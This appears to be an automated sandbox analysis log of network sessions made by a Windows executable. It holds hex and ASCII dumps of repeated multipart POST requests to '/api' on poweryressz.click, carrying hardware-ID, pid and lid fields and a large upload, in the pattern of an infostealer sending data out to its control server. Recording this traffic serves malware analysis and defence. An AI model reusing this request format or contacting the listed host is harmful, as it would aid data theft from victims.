                                                                                                          2024-12-13 15:48:35 UTC1369INData Raw: 6b 77 74 6c 65 47 6c 49 44 76 4c 64 67 5a 39 4e 56 73 47 75 30 39 47 59 56 73 6e 4e 4e 76 44 30 39 2b 4e 49 50 75 4c 4a 59 63 4b 53 43 4f 56 36 71 6c 73 64 59 39 38 48 69 39 69 48 43 2b 35 56 30 4e 6f 55 69 73 70 79 49 6a 44 6c 34 5a 73 38 70 56 67 7a 56 67 4c 5a 74 37 70 73 53 41 74 79 30 63 5a 4c 58 30 59 61 6f 46 4b 55 6e 52 65 49 53 36 41 6e 49 4b 49 31 47 66 77 78 7a 32 66 54 45 51 68 6e 65 47 6f 61 58 6d 47 64 42 63 34 62 42 30 73 75 6c 5a 52 5a 46 4d 74 4a 38 71 41 7a 5a 75 64 5a 2f 53 41 5a 73 30 4b 42 57 69 5a 39 75 6b 34 4e 61 4a 32 44 44 4e 39 57 7a 66 2b 52 52 46 6c 57 57 78 36 67 49 66 47 6e 70 42 6e 38 49 46 67 32 55 64 4b 4a 35 2f 75 70 6d 52 2b 67 6e 63 66 4d 47 67 57 4c 4b 4a 57 57 6d 31 5a 4a 53 37 4e 77 34 4c 52 6b 33 69 38 33 79 58 75
                                                                                                          Data Ascii: kwtleGlIDvLdgZ9NVsGu09GYVsnNNvD09+NIPuLJYcKSCOV6qlsdY98Hi9iHC+5V0NoUispyIjDl4Zs8pVgzVgLZt7psSAty0cZLX0YaoFKUnReIS6AnIKI1Gfwxz2fTEQhneGoaXmGdBc4bB0sulZRZFMtJ8qAzZudZ/SAZs0KBWiZ9uk4NaJ2DDN9Wzf+RRFlWWx6gIfGnpBn8IFg2UdKJ5/upmR+gncfMGgWLKJWWm1ZJS7Nw4LRk3i83yXu
                                                                                                          2024-12-13 15:48:35 UTC1369INData Raw: 50 6b 75 32 70 2b 6a 6e 77 54 4d 47 34 64 4c 72 74 51 51 32 74 56 4c 79 6d 41 7a 59 79 57 6a 43 43 6b 78 30 62 49 58 45 45 76 6b 76 69 69 59 58 61 64 66 41 35 39 49 31 73 35 74 30 30 52 4f 6b 4d 38 4e 63 65 63 67 6f 6a 55 5a 2f 44 48 50 5a 39 4d 51 69 36 5a 36 4b 64 79 63 49 31 2b 45 54 52 6b 48 79 43 7a 58 46 56 6d 55 69 6b 68 7a 49 6a 4c 6b 70 74 6b 39 59 6c 73 30 41 6f 46 61 4a 6e 32 36 54 67 31 71 6d 6f 64 4d 57 42 62 4e 2f 35 46 45 57 56 5a 62 48 71 41 6a 38 4b 55 6c 47 72 36 67 32 44 5a 51 45 34 6f 6c 65 32 6d 5a 48 4f 50 66 68 34 32 5a 42 6f 75 74 56 5a 61 5a 46 67 76 4a 4d 62 44 67 74 47 54 65 4c 7a 66 4a 66 39 52 52 69 53 5a 72 72 59 75 62 4d 74 32 45 6e 30 31 57 79 4f 38 57 46 5a 69 57 43 38 71 78 59 66 47 6c 4a 52 6f 37 6f 39 6c 32 46 68 5a 4b
                                                                                                          Data Ascii: Pku2p+jnwTMG4dLrtQQ2tVLymAzYyWjCCkx0bIXEEvkviiYXadfA59I1s5t00ROkM8NcecgojUZ/DHPZ9MQi6Z6KdycI1+ETRkHyCzXFVmUikhzIjLkptk9Yls0AoFaJn26Tg1qmodMWBbN/5FEWVZbHqAj8KUlGr6g2DZQE4ole2mZHOPfh42ZBoutVZaZFgvJMbDgtGTeLzfJf9RRiSZrrYubMt2En01WyO8WFZiWC8qxYfGlJRo7o9l2FhZK
                                                                                                          2024-12-13 15:48:35 UTC295INData Raw: 34 4e 62 55 78 44 44 35 39 47 43 65 68 59 68 45 36 54 42 4a 69 79 35 58 4c 67 5a 64 32 39 34 70 70 7a 6e 51 4c 63 4d 71 38 2b 7a 49 6e 32 57 35 65 49 6c 4a 56 61 4c 45 63 43 56 74 4d 62 44 53 41 32 35 37 66 31 48 4b 38 33 79 57 59 53 56 6b 36 6d 4f 32 2f 59 7a 4b 31 54 7a 6b 72 5a 78 77 34 74 30 74 65 49 68 74 73 4c 59 44 62 39 64 47 64 5a 2b 65 57 63 39 4a 61 54 47 69 68 6f 4f 6c 34 4e 64 4d 78 4b 7a 35 6a 46 53 2b 6d 54 52 78 46 51 79 59 6c 30 49 54 62 6e 74 51 75 76 49 45 6c 68 78 6b 46 61 4a 72 2f 36 54 67 6c 32 53 70 4c 62 6a 70 4c 65 71 38 53 53 43 4a 44 62 48 71 53 7a 59 79 44 31 44 69 38 77 47 62 4e 57 45 30 72 69 4f 33 75 58 6b 75 73 61 78 4d 37 65 67 6f 57 6a 6c 74 4c 62 31 4d 37 4d 34 79 57 7a 35 2b 61 5a 2b 72 48 4b 35 39 46 43 33 43 6e 72 75
                                                                                                          Data Ascii: 4NbUxDD59GCehYhE6TBJiy5XLgZd294ppznQLcMq8+zIn2W5eIlJVaLEcCVtMbDSA257f1HK83yWYSVk6mO2/YzK1TzkrZxw4t0teIhtsLYDb9dGdZ+eWc9JaTGihoOl4NdMxKz5jFS+mTRxFQyYl0ITbntQuvIElhxkFaJr/6Tgl2SpLbjpLeq8SSCJDbHqSzYyD1Di8wGbNWE0riO3uXkusaxM7egoWjltLb1M7M4yWz5+aZ+rHK59FC3Cnru
                                                                                                          2024-12-13 15:48:35 UTC1369INData Raw: 32 62 65 34 0d 0a 65 4e 43 75 72 58 45 31 30 79 46 4d 5a 6a 68 49 66 2b 41 4f 54 69 78 4d 62 44 53 41 32 35 37 66 31 48 4b 38 33 79 57 59 53 56 6b 36 6d 4f 32 2f 59 7a 4b 31 54 7a 41 36 61 78 34 76 6f 42 35 2f 61 55 45 72 59 6f 37 44 77 39 48 4d 57 62 7a 50 4a 65 41 45 43 7a 44 65 74 75 6c 56 64 6f 56 2f 47 53 74 38 56 67 61 33 57 6c 52 6c 52 57 34 4d 79 35 66 4c 30 64 6f 67 2b 73 63 39 6a 77 51 4c 4c 49 2b 75 38 54 41 6e 30 43 52 4e 61 6a 31 4a 4e 2f 35 46 45 58 51 56 64 48 43 4f 77 39 37 52 7a 43 43 37 68 48 66 4e 54 45 67 2b 6e 61 6d 58 58 6e 61 64 66 42 45 32 62 43 55 57 6e 6c 46 51 59 56 74 75 45 39 61 4f 33 4a 4b 52 5a 38 4b 35 61 39 68 65 54 43 61 59 37 75 6b 75 4e 59 51 78 52 67 51 74 55 32 69 50 45 68 46 36 46 58 52 69 39 59 44 43 6e 35 4e 32 37
                                                                                                          Data Ascii: 2be4eNCurXE10yFMZjhIf+AOTixMbDSA257f1HK83yWYSVk6mO2/YzK1TzA6ax4voB5/aUErYo7Dw9HMWbzPJeAECzDetulVdoV/GSt8Vga3WlRlRW4My5fL0dog+sc9jwQLLI+u8TAn0CRNaj1JN/5FEXQVdHCOw97RzCC7hHfNTEg+namXXnadfBE2bCUWnlFQYVtuE9aO3JKRZ8K5a9heTCaY7ukuNYQxRgQtU2iPEhF6FXRi9YDCn5N27
                                                                                                          2024-12-13 15:48:35 UTC1369INData Raw: 53 47 57 62 65 2f 4f 6b 34 4e 63 78 79 44 43 39 72 47 44 36 7a 47 32 39 63 63 69 49 6c 77 5a 58 63 6e 4a 68 42 2f 35 5a 76 34 58 52 65 4b 35 44 67 72 6e 5a 6b 79 7a 39 65 4d 69 31 44 45 66 41 55 45 56 30 62 62 44 71 41 32 34 79 6b 6c 32 37 79 67 48 50 4f 42 32 77 6d 6d 65 2b 2f 63 48 69 48 55 42 30 73 5a 31 74 6d 38 46 6f 52 4f 67 64 69 59 73 53 53 6a 4d 6e 45 4d 71 66 53 4e 6f 67 61 47 54 66 51 39 2b 6c 32 4e 64 4d 6a 55 48 31 2f 57 33 44 77 47 31 4a 77 52 79 6f 68 31 6f 43 4c 72 36 70 46 36 34 52 31 32 55 6c 31 46 72 58 69 72 32 64 76 6a 48 63 34 48 53 31 56 61 4c 38 63 43 56 73 56 5a 47 4c 2f 7a 59 79 4a 31 44 69 38 73 6d 62 52 52 45 77 2b 6a 36 4f 4d 64 33 61 62 64 78 31 39 49 31 73 75 38 41 51 42 4c 42 55 6f 4d 34 44 62 6e 4d 50 50 4e 61 2f 51 4e 59
                                                                                                          Data Ascii: SGWbe/Ok4NcxyDC9rGD6zG29cciIlwZXcnJhB/5Zv4XReK5DgrnZkyz9eMi1DEfAUEV0bbDqA24ykl27ygHPOB2wmme+/cHiHUB0sZ1tm8FoROgdiYsSSjMnEMqfSNogaGTfQ9+l2NdMjUH1/W3DwG1JwRyoh1oCLr6pF64R12Ul1FrXir2dvjHc4HS1VaL8cCVsVZGL/zYyJ1Di8smbRREw+j6OMd3abdx19I1su8AQBLBUoM4DbnMPPNa/QNY


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.949771172.67.149.1964437560C:\Users\user\Desktop\BDxsBr8Dce.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-13 15:48:37 UTC279OUTPOST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: multipart/form-data; boundary=LF3JRMQT9WPUCM
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 12818
                                                                                                          Host: poweryressz.click
                                                                                                          2024-12-13 15:48:37 UTC12818OUTData Raw: 2d 2d 4c 46 33 4a 52 4d 51 54 39 57 50 55 43 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 36 42 46 44 36 34 33 35 33 46 36 46 37 39 38 38 39 31 36 33 30 37 43 46 33 38 32 35 36 31 42 0d 0a 2d 2d 4c 46 33 4a 52 4d 51 54 39 57 50 55 43 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 46 33 4a 52 4d 51 54 39 57 50 55 43 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 6e 39 0d 0a 2d 2d 4c 46 33 4a 52 4d 51 54 39 57 50
                                                                                                          Data Ascii: --LF3JRMQT9WPUCMContent-Disposition: form-data; name="hwid"16BFD64353F6F7988916307CF382561B--LF3JRMQT9WPUCMContent-Disposition: form-data; name="pid"2--LF3JRMQT9WPUCMContent-Disposition: form-data; name="lid"Dvh8ui--n9--LF3JRMQT9WP
                                                                                                          2024-12-13 15:48:38 UTC1029INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 13 Dec 2024 15:48:37 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=bpc4bha70rbbimqghcgg2iqp5j; expires=Tue, 08-Apr-2025 09:35:16 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ra1NJJ%2FIyQ2vg1%2F%2FLpEJyh%2BXLFz82TAFdqaazGzqKhOYijt7h7xl80yWFKusPHIOvFJiP7VtM6c50gixU9U4xb%2FiLSqY6OFX31HRIekYqkibb%2FUrzUzzqeggQj%2FcmbQA82Q70g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f171975bb3d421f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2570&min_rtt=1754&rtt_var=1241&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13755&delivery_rate=1664766&cwnd=239&unsent_bytes=0&cid=e3113cba624da771&ts=779&x=0"
                                                                                                          2024-12-13 15:48:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                          2024-12-13 15:48:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.949777172.67.149.1964437560C:\Users\user\Desktop\BDxsBr8Dce.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-13 15:48:39 UTC278OUTPOST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: multipart/form-data; boundary=SWENWZFFY5454
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 15030
                                                                                                          Host: poweryressz.click
                                                                                                          2024-12-13 15:48:39 UTC15030OUTData Raw: 2d 2d 53 57 45 4e 57 5a 46 46 59 35 34 35 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 36 42 46 44 36 34 33 35 33 46 36 46 37 39 38 38 39 31 36 33 30 37 43 46 33 38 32 35 36 31 42 0d 0a 2d 2d 53 57 45 4e 57 5a 46 46 59 35 34 35 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 53 57 45 4e 57 5a 46 46 59 35 34 35 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 6e 39 0d 0a 2d 2d 53 57 45 4e 57 5a 46 46 59 35 34 35 34 0d
                                                                                                          Data Ascii: --SWENWZFFY5454Content-Disposition: form-data; name="hwid"16BFD64353F6F7988916307CF382561B--SWENWZFFY5454Content-Disposition: form-data; name="pid"2--SWENWZFFY5454Content-Disposition: form-data; name="lid"Dvh8ui--n9--SWENWZFFY5454
                                                                                                          2024-12-13 15:48:40 UTC1027INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 13 Dec 2024 15:48:40 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=7e1jpsp1p86vslsuaupms47ft8; expires=Tue, 08-Apr-2025 09:35:18 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uZmVS%2FLsjeriq8c9IMk%2Fr%2FCUpdLcjxJtLTdr7wlSMeoj%2BQBryd8It%2B1bS7y5OkwKbWwIBG5lPqTPWCQ9eo2Q7g5M7EJGFxeGQ6DrVAOUeCcoeIO8PUCLPyqk4w2aQSYQkK%2FfSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f171982f9e242c0-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1860&min_rtt=1846&rtt_var=722&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2845&recv_bytes=15966&delivery_rate=1486005&cwnd=208&unsent_bytes=0&cid=1786a13887f05163&ts=1067&x=0"
                                                                                                          2024-12-13 15:48:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                          2024-12-13 15:48:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.949783172.67.149.1964437560C:\Users\user\Desktop\BDxsBr8Dce.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-13 15:48:41 UTC280OUTPOST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: multipart/form-data; boundary=IFJRN7LXLE8J2KV
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 20558
                                                                                                          Host: poweryressz.click
                                                                                                          2024-12-13 15:48:41 UTC15331OUTData Raw: 2d 2d 49 46 4a 52 4e 37 4c 58 4c 45 38 4a 32 4b 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 36 42 46 44 36 34 33 35 33 46 36 46 37 39 38 38 39 31 36 33 30 37 43 46 33 38 32 35 36 31 42 0d 0a 2d 2d 49 46 4a 52 4e 37 4c 58 4c 45 38 4a 32 4b 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 49 46 4a 52 4e 37 4c 58 4c 45 38 4a 32 4b 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 6e 39 0d 0a 2d 2d 49 46 4a 52 4e 37 4c 58
                                                                                                          Data Ascii: --IFJRN7LXLE8J2KVContent-Disposition: form-data; name="hwid"16BFD64353F6F7988916307CF382561B--IFJRN7LXLE8J2KVContent-Disposition: form-data; name="pid"3--IFJRN7LXLE8J2KVContent-Disposition: form-data; name="lid"Dvh8ui--n9--IFJRN7LX
                                                                                                          2024-12-13 15:48:41 UTC5227OUTData Raw: 4a 24 6e 49 6e c9 56 ca e5 5a 2b a1 3f 3a 9e b9 75 bf a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 17 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 fa a3 60 6e dd
                                                                                                          Data Ascii: J$nInVZ+?:us}Q0u?4E([:s~X`n
                                                                                                          2024-12-13 15:48:42 UTC1021INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 13 Dec 2024 15:48:42 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=l9i60p7lo48ofe9mu989a2jigd; expires=Tue, 08-Apr-2025 09:35:21 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ACbZ392YJ%2FQJyzFQWL7Av32O6NjThBlpYKkHGAcbit%2BKyfHCrvTZ57nQKpVu3Ujr3YJQ9YuOH4T0e4abvbfCEyoR%2BCVSyJABAHBPE0oFnsdAI6FxTtBfKrnqfORhBbUf9iSHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f171992ca36c338-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1665&rtt_var=632&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21518&delivery_rate=1722713&cwnd=228&unsent_bytes=0&cid=52bc6ef95c0db13c&ts=857&x=0"
                                                                                                          2024-12-13 15:48:42 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                          2024-12-13 15:48:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.949789172.67.149.1964437560C:\Users\user\Desktop\BDxsBr8Dce.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-13 15:48:44 UTC283OUTPOST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: multipart/form-data; boundary=EX9TJ7CM5S7CA20MLJJ
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 1228
                                                                                                          Host: poweryressz.click
                                                                                                          2024-12-13 15:48:44 UTC1228OUTData Raw: 2d 2d 45 58 39 54 4a 37 43 4d 35 53 37 43 41 32 30 4d 4c 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 36 42 46 44 36 34 33 35 33 46 36 46 37 39 38 38 39 31 36 33 30 37 43 46 33 38 32 35 36 31 42 0d 0a 2d 2d 45 58 39 54 4a 37 43 4d 35 53 37 43 41 32 30 4d 4c 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 58 39 54 4a 37 43 4d 35 53 37 43 41 32 30 4d 4c 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 6e 39
                                                                                                          Data Ascii: --EX9TJ7CM5S7CA20MLJJContent-Disposition: form-data; name="hwid"16BFD64353F6F7988916307CF382561B--EX9TJ7CM5S7CA20MLJJContent-Disposition: form-data; name="pid"1--EX9TJ7CM5S7CA20MLJJContent-Disposition: form-data; name="lid"Dvh8ui--n9
                                                                                                          2024-12-13 15:48:44 UTC1025INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 13 Dec 2024 15:48:44 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=jtf2r7dsa6n3v64d93gckbmsgi; expires=Tue, 08-Apr-2025 09:35:23 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YrvJicCu%2BPlCyr%2BWx7sfFRN4GH50QK3Jd6ZoAUM%2BZibazSl%2BON7hrMtx1Ldt%2BV743zwuxmcVByEWqcs7nu26nfvrKlGFKdaWO%2FTNiyhYaBj6G17foKGRpz2BpN%2FY9qlMyAU2yQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1719a1dfc419cf-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1837&min_rtt=1837&rtt_var=918&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4232&recv_bytes=2147&delivery_rate=317046&cwnd=252&unsent_bytes=0&cid=6119230607520b52&ts=753&x=0"
                                                                                                          2024-12-13 15:48:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                          2024-12-13 15:48:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.949796172.67.149.1964437560C:\Users\user\Desktop\BDxsBr8Dce.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-13 15:48:46 UTC276OUTPOST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: multipart/form-data; boundary=FG4GJ0RIJO
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 556068
                                                                                                          Host: poweryressz.click
                                                                                                          2024-12-13 15:48:46 UTC15331OUTData Raw: 2d 2d 46 47 34 47 4a 30 52 49 4a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 36 42 46 44 36 34 33 35 33 46 36 46 37 39 38 38 39 31 36 33 30 37 43 46 33 38 32 35 36 31 42 0d 0a 2d 2d 46 47 34 47 4a 30 52 49 4a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 47 34 47 4a 30 52 49 4a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 6e 39 0d 0a 2d 2d 46 47 34 47 4a 30 52 49 4a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                                                          Data Ascii: --FG4GJ0RIJOContent-Disposition: form-data; name="hwid"16BFD64353F6F7988916307CF382561B--FG4GJ0RIJOContent-Disposition: form-data; name="pid"1--FG4GJ0RIJOContent-Disposition: form-data; name="lid"Dvh8ui--n9--FG4GJ0RIJOContent-Dis
